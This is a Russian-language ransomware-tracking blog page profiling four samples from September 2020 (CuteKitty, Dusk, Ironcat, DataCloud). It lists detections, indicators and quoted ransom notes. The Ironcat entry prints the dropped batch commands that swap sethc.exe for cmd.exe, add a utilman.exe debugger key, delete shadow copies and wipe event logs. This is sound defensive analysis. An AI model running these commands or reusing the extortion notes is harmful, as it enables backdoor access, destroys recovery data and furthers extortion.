Если вы не видите здесь изображений, то используйте VPN.

суббота, 26 сентября 2020 г.

CuteKitty

CuteKitty Ransomware

Meow Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English


Этот крипто-вымогатель шифрует данные пользователей с помощью AES+RSA, а затем требует выкуп в 1 BTC, чтобы вернуть файлы. Оригинальное название: в записке не указано. На файле написано: 
CuteKitty.exe. Для Windows x64. 
---
Обнаружения:
DrWeb -> Trojan.Encoder.32702
BitDefender -> Trojan.GenericKD.43907306
Avira (no cloud) -> TR/FileCoder.ozgie
ESET-NOD32 -> A Variant Of Win64/Filecoder.AJ
Malwarebytes -> ***
Rising -> ***
Symantec -> Downloader
TrendMicro -> TROJ_GEN.R067H0CIT20
---
To AV vendors! Want to be on this list regularly or be higher on the list? Contact me! 
AV вендорам! Хотите быть в этом списке регулярно или повыше? Сообщите мне!


© Генеалогия: ✂️ FonixCrypter >> CuteKitty (Meow)

Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: *нет данных*.
 

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Образец этого крипто-вымогателя был найден в конце сентября 2020 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Запиской с требованием выкупа выступает надпись из командной строки: 

Содержание записки о выкупе:
Meow
Send one bweetcoin to papi@cats.meow ^-^

Перевод записки на русский язык:
Мяу
Пошли мне 1 bweetcoin на papi@cats.meow ^-^



Технические детали

Не данных о том, для чего это было сделано, распространяется или нет. 


После доработки или модификации может начать распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
CuteKitty.exe 
fuck.exe

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
C:\Users\user\Desktop\CuteKitty.exe
C:\Users\user\Desktop\fuck.exe

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Мьютексы:
См. ниже результаты анализов.

Сетевые подключения и связи:
DNS: xxxx://meoww.cat/
Email: papi@cats.meow 
BTC:
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
🔻 Triage analysis >>
Hybrid analysis >>
𝚺  VirusTotal analysis >>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.



=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===



=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Ещё не было обновлений этого варианта.



=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as ***)
 Write-up, Topic of Support
 * 
 Thanks: 
 Bart
 Andrew Ivanov (author)
 ***
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles. Contact.

среда, 23 сентября 2020 г.

Dusk

Dusk Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English


Этот крипто-вымогатель шифрует данные пользователей с помощью AES+RSA, а затем требует выкуп в $50 в BTC, чтобы вернуть файлы. Оригинальное название: Dusk. На файле написано: Dusk.exe. 
---
Обнаружения:
DrWeb -> Trojan.Encoder.32629
BitDefender -> DeepScan:Generic.Ransom.Small.0597F46B
ALYac -> Trojan.Ransom.Filecoder
Avira (no cloud) -> TR/Dropper.MSIL.Gen
ESET-NOD32 -> A Variant Of MSIL/Filecoder.AK
Malwarebytes -> Ransom.FileCryptor.MSIL
Rising -> ***
Symantec -> Ransom.HiddenTear!g1
Tencent -> Msil.Trojan.Encoder.Eann
TrendMicro -> TROJ_GEN.R002C0OIN20
---
To AV vendors! Want to be on this list regularly or be higher on the list? Contact me! 
AV вендорам! Хотите быть в этом списке регулярно или повыше? Сообщите мне!


© Генеалогия: ✂️ KesLan >> Dusk
Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: .Dusk

Визуализация зашифрованного файла: 


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на конец сентября 2020 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: !#!READ-ME!#!.txt

 

Содержание записки о выкупе:
---
DUSK
---
Dusk v1.0
YOUR FILES ARE ENCRYPTED!
---
If you want to recover them follow these steps:
1. Send $50 to this address:
BTC: 1EiGoumiJiBNDszEzTzasmQhCVaEYDDEbuo
2. Send email to:
cyber.duskfly&protonmail.com
3. Enjoy!
Do not waste your time trying recover your files using third party services! Only we can do that

Перевод записки на русский язык:
---
DUSK
---
Dusk v1.0
ВАШИ ФАЙЛЫ ЗАШИФРОВАНЫ!
---
Если вы хотите вернуть их, выполните эти шаги:
1. Отправьте $50 на этот адрес:
BTC: 1EiGoumiJiBNDszEzTzasmQhCVaEYDDEbuo
2. Пришлите email на:
cyber.duskfly&protonmail.com
3. Радуйтесь!
Не тратьте свое время на восстановление файлов с помощью чужих сервисов! Только мы можем это сделать




Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
!#!READ-ME!#!.txt - название файла с требованием выкупа
Dusk.exe - название вредоносного файла
Dusk.pdb - оригинальное  название проекта

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
C:\Users\Engineer\source\repos\Dusk\Dusk\obj\Release\Dusk.pdb

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Мьютексы:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: cyber.duskfly@protonmail.com
BTC: 1EiGoumJiBNJszEzTzasmQhCVaEYDDEbuo
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
🔻 Triage analysis >>
Hybrid analysis >>
𝚺  VirusTotal analysis >>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>

Ошибки:


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.



=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

Dusk Ransomware - сентябрь 2020
Dusk 2 Ransomware - ноябряь 2020


=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 9 ноября 2020:
Расширение: .DUSK 
Записка: README.txt
Email: lasvegasincel@cocl.li, duskeer@protonmail.com
Результаты анализов: VT + IA
➤ Содержание записки: 
------------------------------------------  
DUSK
2
------------------------------------------
All your files have been encrypted using military grade encryption algorithms!
They cannot be decrypted without our securely generated key.
The only thing you can do now is buy your key and decryptor.
The price is 80 USD.
The only payment method we accept is BitCoin.
<<<<How to obtain Bitcoins?>>>>
The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. 
https://localbitcoins.com/buy_bitcoins
Also you can find other places to buy Bitcoins and beginners guide here:
http://www.coindesk.com/information/how-can-i-buy-bitcoins/
<<<<How to contact you for the payment?>>>>
We use E-Mail to contact with our customers. 
When contacting us please send your personal ID that can be seen at the end of the message.
Our main e-mail is: 
lasvegasincel@cock.li
Our backup e-mail is:
duskeer@protonmail.com
NOTE:
Write to our backup e-mail only when you don't receive reply from our main e-mail in 48 hours.
<<<<Why do we do that?>>>>
We Are anonymous good people. We will transfer 75% of what we earn for good purposes.
<<<<If you're so evil>>>>
If you're evil and don't trust us you can send up to 2 files for free decryption. They can't weigh more than 2 MB (non-archived).
<<<<Attention!>>>>
Do not try to restore files without our help, this is useless and you may lose data permanetly
Do not rename encrypted files!
Do not use third party "decryptors"
Do not try to remove our heavenly software using evil AntiVirus or AntiMalware software
<<<<Personal ID>>>>
SgQUfK3wjAGJLsIfq4p0wvO2E3gig5q [всего 684 знаков]





=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as ***)
 Write-up, Topic of Support
 * 
 Thanks: 
 S!Ri, GrujaRS
 Andrew Ivanov (author)
 Lukáš Zobal
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles. Contact.

вторник, 22 сентября 2020 г.

Ironcat

Ironcat Ransomware

(шифровальщик-НЕ-вымогатель) (первоисточник)
Translation into English


Этот крипто-вымогатель шифрует данные в процессе исследования вредоносных программ, а затем делает вид, что требует выкуп, чтобы вернуть файлы. Оригинальное название: Ironcat. На файле написано: iai-users.exe. Написан на языке Go. 

Создатель программы Аарон Розенмунд сообщил мне, что она была сделана для исследований и практических упражнений и никогда не распространялась с вредоносной целью. 
---
Обнаружения:
DrWeb -> Trojan.Encoder.32634
BitDefender -> Generic.Ransom.Snatch.D0860D4B
ALYac -> Trojan.Ransom.Filecoder
Avira (no cloud) -> TR/Cobalt.nphvp
ESET-NOD32 -> A Variant Of Win64/Filecoder.CJ
Kaspersky -> Trojan.Win32.Cobalt.aga
Malwarebytes -> Ransom.Sodinokibi.GO
Symantec -> Trojan.Gen.2
Tencent -> Win32.Trojan.Cobalt.Wtec
TrendMicro -> TROJ_FRS.VSNTIN20
---
To AV vendors! Want to be on this list regularly or be higher on the list? Contact me! 
AV вендорам! Хотите быть в этом списке регулярно или повыше? Сообщите мне!


© Генеалогия: ??? >> Ironcat
Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: 
.encrypted

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Образец этого крипто-вымогателя был найден во второй половине сентября 2020 г. Ориентирован на англоязычных пользователей. 

Записка с требованием выкупа называется: pay_the_piper.txt


Содержание записки о выкупе:
tazerface strikes again! Now with twice the ransom! 
---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ENCRYPTED
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
  a) Download and install TOR browser from this site: https://torproject.org/
  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA78BD67965B1577
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
  b) Open our secondary website: http://decryptor.cc/CA78BD67965B1577
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
windowsOgqhBdcaMCjDnoLhPEpFLBoNenFIHiOdPANOchCCrIdMsaamPqHdeBMFebOFCeDf_ _
!!!!DANGER!!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!

Перевод записки на русский язык:
tazerface снова бьет! Теперь с вдвое большим выкупом!
--- === Добро пожаловать. Снова. === ---
[+] Что случилось? [+]
Ваши файлы зашифрованы и теперь недоступны. Вы можете это проверить: все файлы в вашей системе имеют расширение ENCRYPTED
Кстати, все можно восстановить (вернуть), но нужно следовать нашим инструкциям. Иначе вы не сможете вернуть свои данные (НИКОГДА).
[+] Какие гарантии? [+]
Это просто бизнес. Мы абсолютно не заботимся о вас и ваших сделках, кроме получения выгоды. Если мы не будем выполнять свою работу и обязательства - никто с нами не будет сотрудничать. Это не в наших интересах.
Чтобы проверить возможность возврата файлов, Вам следует зайти на наш сайт. Там можно бесплатно расшифровать один файл. Это наша гарантия.
Если вы не будете сотрудничать с нашим сервисом - для нас это не имеет значения. Но вы потеряете свое время и данные, потому что только у нас есть закрытый ключ. На практике время гораздо дороже денег.
[+] Как получить доступ на сайт? [+]
У вас есть два пути:
1) [Рекомендуется] Используйте браузер TOR!
  а) Загрузите и установите браузер TOR с этого сайта: https://torproject.org/
  б) Откройте наш сайт: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA78BD67965B1577
2) Если TOR заблокирован в вашей стране, попробуйте использовать VPN! Но вы можете использовать наш вторичный сайт. Для этого:
  а) Откройте любой браузер (Chrome, Firefox, Opera, IE, Edge)
  б) Откройте наш дополнительный веб-сайт: http://decryptor.cc/CA78BD67965B1577
Предупреждение: вторичный сайт может быть заблокирован, поэтому первый вариант намного лучше и доступнее.
Когда вы открываете наш сайт, введите в форму ввода следующие данные:
Ключ:
windowsOgqhBdcaMCjDnoLhPEpFLBoNenFIHiOdPANOchCCrIdMsaamPqHdeBMFebOFCeDf_ _
!!!!ОПАСНОСТЬ!!!
НЕ ПЫТАЙТЕСЬ изменять файлы сами, НЕ используйте сторонние программы для восстановления ваших данных или антивирусные решения - это может повлечь за собой повреждение закрытого ключа и, как следствие, потерю всех данных.
!!! !!! !!!
ЕЩЕ ОДИН РАЗ. В ваших интересах вернуть свои файлы. Со своей стороны мы (лучшие специалисты) делаем все для восстановления, но не должны мешать.
!!! !!! !!!


Текст записки позаимствован из Sodinokibi Ransomware
Оттуда же заимствованы адреса сайтов, указанных в записке о выкупе. 
Согласно информации, полученной от разных специалистов по крипто-вымогателям, Ironcat не имеет отношения к Sodinokibi. 
Платить выкуп по ней НЕ нужно! 😸


Технические детали

Создатель программы Аарон Розенмунд сообщил мне, что она была сделана для исследований и практических упражнений. 
Но, если кто-то модифицирует и перенастроит программу, то она может начать распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1


➤ После того, как все файлы зашифрованы, бинарник помещает четыре командных файла в каталог C:\Windows. У каждого своя функция.

Файл chtes.bat позволяет 5 раз нажать любую клавишу на экране входа в систему и запустить административную консоль cmd.exe: 
“Chtes.bat” copy c:\Windows\System32\sethc.exe c:\Windows\System32\sethc.old && && del c:\Windows\System32\sethc.exe && copy c:\Windows\System32\cmd.exe c:\Windows\System32\sethc.exe

Файл netlogin.bat добавляет ключ reg для запуска административной консоли cmd.exe при каждом запуске utilman.exe, пропуская экраны входа и ограничения пользователя: 
“Netlogin.bat” REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

Файл shadow.bat удаляет все теневые копии, которые можно было использовать для восстановления данных: 
“Shadow.bat” cmd /C vssadmin delete shadows /all

Файл mssupdate.bat удаляет все журналы событий Windows.
“mssupdate.bat” FOR /F "delims=" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%%I")

➤ Если сопоставить задачи, то описанный функционал фактически использует дыру в безопасности Windows для запуска следующей команды:
copy C:\Windows\System32\sethc.exe c:\Windows\System32\chtes.old && del c:\Windows\System32\sethc.exe && copy c:\Windows\System32\cmd.exe c:\Windows\System32\sethc.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
Этот трюк позволяет выполнить любую команду с правами системы на экране входа в Windows до прохождения процедуры авторизации. При этом он подменяет исполняемый файл sethc.exe ("Sticky Keys") на свой файл. 

➤ Код JavaScript компилирован в исполняемый файл. 

Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
pay_the_piper.txt - название исполняемого файла
iai-users.exe
iai-inetpub.exe
iai-sql.exe
iai-file.exe - название вредоносного файла
Подробнее в статье разработчика этой учебной программы. 
netlogin.bat
shadow.bat
mssupdate.bat

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
C:\Windows\netlogin.bat
C:\Windows\shadow.bat
C:\Windows\mssupdate.bat
C:\Windows\chtes.bat

Называет себя Ironcat



Записи реестра, связанные с этим Ransomware:
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
См. ниже результаты анализов.

Мьютексы:
См. ниже результаты анализов.

Сетевые подключения и связи:
URL: http://fakebook.com
URL: http://decryptor.cc/CA78BD67965B1577
Tor-URL: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA78BD67965B1577
 

Email: - 
BTC: - 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Triage analysis >>
Hybrid analysis >>
𝚺  VirusTotal analysis >>  VT>  VT> VT>
🐞 Intezer analysis >>  IA>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.



=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===



=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 26-28 сентября 2020: 
Разработчик Ironcat-а, Aaron Rosenmund вышел на связь и сообщил, что его программа не предназначена для распространения и вредоносного использования. Он также открыл блог на своем сайте и в первом сообщении рассказал историю программы Ironcat и разместил мою картинку, которую я сделал логотипом этой статьи.

Из его рассказа стало известно, что 
Ironcat имеет защиту от вредоносных действий. 
Если запустить исполняемый файл без аргументов, он проверит это и сообщит вам, что вы не Ironcat: "I am ironcat, and you're not".
Это и есть защита от случайного запуска. Только с правильными аргументами он запуститься для шифрования файлов. 
Таким же образом, только с правильными аргументами работает дешифрование. При запуске с неправильными аргументами, Ironcat вместо обычного сообщения об ошибке напишет, что он любит чизбургеры.  






=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
 Read to links: 
 Tweet on Twitter + Tweet + Tweet + myTweet + Tweet
 ID Ransomware (ID as Ironcat)
 Write-up, Topic of Support
 * 
 Thanks: 
 Joakim Kennedy, Michael Gillespie
 Andrew Ivanov (author)
 Aaron Rosenmund (Ironcat dev)
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles. Contact.

DataCloud

DataCloud Ransomware

DataCloud Hand-Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English


Этот крипто-вымогатель делает вид, что шифрует данные пользователей, помещает их в один большой файл без расширения, а затем требует выкуп в # BTC, чтобы вернуть файлы. Оригинальное название: в записке не указано. На файле написано: нет данных.
---
Обнаружения:
DrWeb ->
BitDefender ->
ALYac ->
Avira (no cloud) ->
ESET-NOD32 ->
Malwarebytes ->
Rising ->
Symantec ->
TrendMicro ->
---
To AV vendors! Want to be on this list regularly or be higher on the list? Contact me! 
AV вендорам! Хотите быть в этом списке регулярно или повыше? Сообщите мне!


© Генеалогия: другие Hand-Ransomware >> DataCloud
Изображение — логотип статьи

К заблокированным файлам никакое расширение на 
добавляется

Пример большого файла с 48-ю знаками: 3590F75ABA9E485486C100C1A9D4FF06RXLYDXVKOSA*****

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на вторую половину сентября 2020 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: README!!!!!!.txt


Содержание записки о выкупе: 

Good time of day.
All your data has been moved to the cloud.
All of your information has two use cases.
1. The return of the entire data array to you while maintaining complete confidentiality.
2. Use of the entire data array at our discretion.
This option threatens you with big legal problems.
If you are interested in the first option, you can contact    data_cloud2012@aol.com       id  149902*****
Based on the fact that the largest irreplaceable resource is time.
You have 72 hours to make a decision.
Please also note that we do not insist on your use of the first option, the shadow information market is quite wide.

Перевод записки на русский язык:
Доброго времени суток.
Все ваши данные перенесены в облако.
Вся ваша информация имеет два варианта использования.
1. Возврат всего массива данных вам с сохранением полной конфиденциальности.
2. Использование всего массива данных по нашему усмотрению.
Этот вариант грозит вам большими юридическими проблемами.
Если вас интересует первый вариант, вы можете связаться с data_cloud2012@aol.com id 149902*****
Исходя из того, что самый большой невосполнимый ресурс - это время.
У вас есть 72 часа, чтобы принять решение.
Также обратите внимание, что мы не настаиваем на использовании вами первого варианта, рынок теневой информации достаточно широк.



Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
README!!!!!!.txt - название файла с требованием выкупа
<random>.exe - случайное название вредоносного файла

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Мьютексы:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: data_cloud2012@aol.com
BTC: - 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.



=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===



=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Ещё не было обновлений этого варианта.



=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
 Read to links: 
 Tweet on Twitter: myTweet
 ID Ransomware (ID as ***)
 Write-up, Topic of Support
 * 
 Thanks: 
 Andrew Ivanov (author), Michael Gillespie
 ***
 ***
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles. Contact.

Постоянные читатели

My tweet feed

My tweet feed
Follow me!

My profile on BC

My profile on BC
Follow me!

Форма для связи / Contact

Имя

Электронная почта *

Сообщение *